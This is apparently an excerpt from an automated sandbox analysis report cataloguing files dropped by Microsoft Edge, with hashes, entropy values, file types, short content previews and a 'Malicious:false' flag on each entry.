                                                                                                                                                                                                                                                SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                Entropy (8bit):0.10281752965116953
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:+yBIIl3yBQspEjVl/PnnnnnnnnnnnvoQ/Eou:+y+wynoPnnnnnnnnnnnv1j
                                                                                                                                                                                                                                                MD5:18350ECEFBCDF33A0E80E6DFCE78CF97
                                                                                                                                                                                                                                                SHA1:0BA6462FF8341DC5F170B9D5652976DB4A8DAE0A
                                                                                                                                                                                                                                                SHA-256:37039B07596ADD408FFA90204DA6F2014477BF705710C46DF1AA80F58CEC8459
                                                                                                                                                                                                                                                SHA-512:DA87ECBFFD5ECD518EB7767E563D5B0A0585A1381532C77E3C9A18E16F2F82B64B92B27045EB60C86513AB9B7A2FB8C106FACFC6C009EBAEC7014C88AD9B34CE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):317272
                                                                                                                                                                                                                                                Entropy (8bit):0.8875544868111808
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:5M2rw718MME5FCCfG1VJSJ91DJv8vydy2iCyKy8zQyTxyJI:U57
                                                                                                                                                                                                                                                MD5:A9029D0B8DC635AC62666D13EB841F1C
                                                                                                                                                                                                                                                SHA1:7EBB02C6993ED82A80415A185EBD505E86F433E3
                                                                                                                                                                                                                                                SHA-256:3846386C2AC1FC98D770A30C07E31E2CB92C15AC9A76F53690046EE0D5A39B47
                                                                                                                                                                                                                                                SHA-512:C066144B5AC55F93B95C3D1BA20AF6A228443EE34F39FC3C6D0E43BFDC88DCBEAC2810BA615C4322EDDF4F658C9CAFB6693744E66C3E29A8F359D2DA1933DE6D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):485
                                                                                                                                                                                                                                                Entropy (8bit):4.037793661135485
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:/XntM+dl3sedhOmOuuuuuuuuuuh9illFtHOOfIjUPsedhO8:llc8BOuuuuuuuuuuhgll3S8x
                                                                                                                                                                                                                                                MD5:9C8E29FD9910ADFE4325180F72E2FA1D
                                                                                                                                                                                                                                                SHA1:52029EF56915A58870A4241FD3B022E7FF7783FB
                                                                                                                                                                                                                                                SHA-256:2FFAD5BC9802332CF6BDFCC76F2B99AD7250493A5CB13358DBC128676E864288
                                                                                                                                                                                                                                                SHA-512:54ECE3D1678D9569D14B3449D8BC299886D040FF688F1DDB19D4BD2B3456C46A5AD26BB64E11ACD6D0704301BC69C9FA90997EBB182BF7877E831F237AB72C0A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):330
                                                                                                                                                                                                                                                Entropy (8bit):5.2492635066046125
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/vt+q2PcNwi23oH+TcwtfrK+IFUt8O/bZmw+O/XYVkwOcNwi23oH+TcwtfrUeLJ:7/vovLZYeb23FUt8O/b/+O/XQ54ZYeb5
                                                                                                                                                                                                                                                MD5:96072FD57C0A5011B047959D409CC39F
                                                                                                                                                                                                                                                SHA1:2FEE9999626743A0F16A63ABDDEC6A121197FA09
                                                                                                                                                                                                                                                SHA-256:9EBFF41B956848DFD67698582C3F0F34BDD2FEF8925DA53FA53BEB25B0EC47C9
                                                                                                                                                                                                                                                SHA-512:A6CEB61D826F6534C1DEB73C42BAD871039EE71A8F371CFF5FC718CF42942E69E24AA086CD562A3B7A300BDE8F2493352389A0DDD6C6EE28533CC171B0E0DBD1
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:27.382 16e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/16-11:07:27.384 16e8 Recovering log #3.2024/12/16-11:07:27.385 16e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):782
                                                                                                                                                                                                                                                Entropy (8bit):4.049291162962452
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ys:G0nYUtypD32m3yWlIZMBA5NgKIvB8s
                                                                                                                                                                                                                                                MD5:FDF465758A7489458B387EB41C7D42B0
                                                                                                                                                                                                                                                SHA1:9509283CF1BD7397790091C5A7580CBA353A1143
                                                                                                                                                                                                                                                SHA-256:C5A7592A847D101DCB71AEE0A234835548121C647E6D99EF794337823A347703
                                                                                                                                                                                                                                                SHA-512:9E40B768990B3FAC6960274C5C78F9B86585100DBFE92BC885FC5384937F2922C3ED435B44C42DEAC138E8FB22CD1EED865DBB984CFFDAE8ED0BE96EDADA1698
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....X...................20_.....W.J+.................19_......qY.................18_.....'}2..................37_.......c..................38_......i...................39_.....Owa..................20_.....4.9..................20_.....B.I..................19_..........................18_.....2.1..................37_..........................38_......=.%.................39_.....p.j..................9_.....JJ...................9_.....|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):348
                                                                                                                                                                                                                                                Entropy (8bit):5.23502312094087
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/w+q2PcNwi23oH+TcwtfrzAdIFUt8O/U4XZmw+O/U43VkwOcNwi23oH+Tcwtfrm:7/1vLZYeb9FUt8O/U0/+O/U054ZYeb2J
                                                                                                                                                                                                                                                MD5:5D9D74E100428881E238DE865F287134
                                                                                                                                                                                                                                                SHA1:5689967E0515CC7575725542209BF9275AB3FD01
                                                                                                                                                                                                                                                SHA-256:5F3CF8FA6C12AB6E89D270895F4715C28CDE4A659860D2640FE64BA7B1BA4FB1
                                                                                                                                                                                                                                                SHA-512:2A1B2CFC321577528A79420568DCF08EEB61241EB4A36891625603A4D400D97C5690BC34E08D92565A7FAD2FCA29A4BAC548BC899E3F2A0CD111CEFAD5899AB8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:27.374 16e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/16-11:07:27.375 16e8 Recovering log #3.2024/12/16-11:07:27.375 16e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):120
                                                                                                                                                                                                                                                Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):13
                                                                                                                                                                                                                                                Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:117.0.2045.47
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):44236
                                                                                                                                                                                                                                                Entropy (8bit):6.0895545630243495
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kdTKKGf4SitBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynLt5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                MD5:C4D1B965968C17D24E4076A6A1C93333
                                                                                                                                                                                                                                                SHA1:779982352E22721CCDD99A03CA7B919D6180DB31
                                                                                                                                                                                                                                                SHA-256:8B4FE95B4A247F27AC66BF59C52B360DF1BCC7F37769664282F4FAA488BC52DA
                                                                                                                                                                                                                                                SHA-512:73A7F6734787B1763E146C863AA776F74861EBCB5A9FEDB11C0BC8228475F6CA63495D5BB64CF08572FC3186E9A72E967266560B940048DB9965E64B08C6C249
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:SQLite format 3
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):47
                                                                                                                                                                                                                                                Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):35
                                                                                                                                                                                                                                                Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"forceServiceDetermination":false}
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):81
                                                                                                                                                                                                                                                Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):130439
                                                                                                                                                                                                                                                Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:synchronousLookupUris_638343870221005468
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):57
                                                                                                                                                                                                                                                Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):29
                                                                                                                                                                                                                                                Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:topTraffic_638004170464094982
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):575056
                                                                                                                                                                                                                                                Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):460992
                                                                                                                                                                                                                                                Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9
                                                                                                                                                                                                                                                Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:uriCache_
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):179
                                                                                                                                                                                                                                                Entropy (8bit):5.024935856616373
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclR1TVQ6Y:YWLSGTt1o9LuLgfGBPAzkVj/T8lvVQ6Y
                                                                                                                                                                                                                                                MD5:B9AD8915652D5E2E171FB7E8B703A583
                                                                                                                                                                                                                                                SHA1:F6ED2D1323634B765B56EA8CC595BB5C177774A6
                                                                                                                                                                                                                                                SHA-256:32693FD55F727AF39595B766522C559CCDB0D4C94651429065BAFE1F9D55C127
                                                                                                                                                                                                                                                SHA-512:A782D9970A4B31A5789AE7AF85F0C21D924C3BB3B3CEAC142392F4E3E789ADA7C845C3E15660D15EDF7DD1F9E724CB257B74F6B3BABA42AD55E82E8971172D9A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1734466051977508}]}
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):86
                                                                                                                                                                                                                                                Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQp:YQ3Kq9X0dMgAEwjj
                                                                                                                                                                                                                                                MD5:F732DBED9289177D15E236D0F8F2DDD3
                                                                                                                                                                                                                                                SHA1:53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
                                                                                                                                                                                                                                                SHA-256:2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
                                                                                                                                                                                                                                                SHA-512:B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):44236
                                                                                                                                                                                                                                                Entropy (8bit):6.0895545630243495
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kdTKKGf4SitBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynLt5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                MD5:C4D1B965968C17D24E4076A6A1C93333
                                                                                                                                                                                                                                                SHA1:779982352E22721CCDD99A03CA7B919D6180DB31
                                                                                                                                                                                                                                                SHA-256:8B4FE95B4A247F27AC66BF59C52B360DF1BCC7F37769664282F4FAA488BC52DA
                                                                                                                                                                                                                                                SHA-512:73A7F6734787B1763E146C863AA776F74861EBCB5A9FEDB11C0BC8228475F6CA63495D5BB64CF08572FC3186E9A72E967266560B940048DB9965E64B08C6C249
                                                                                                                                                                                                                                                Malicious:false
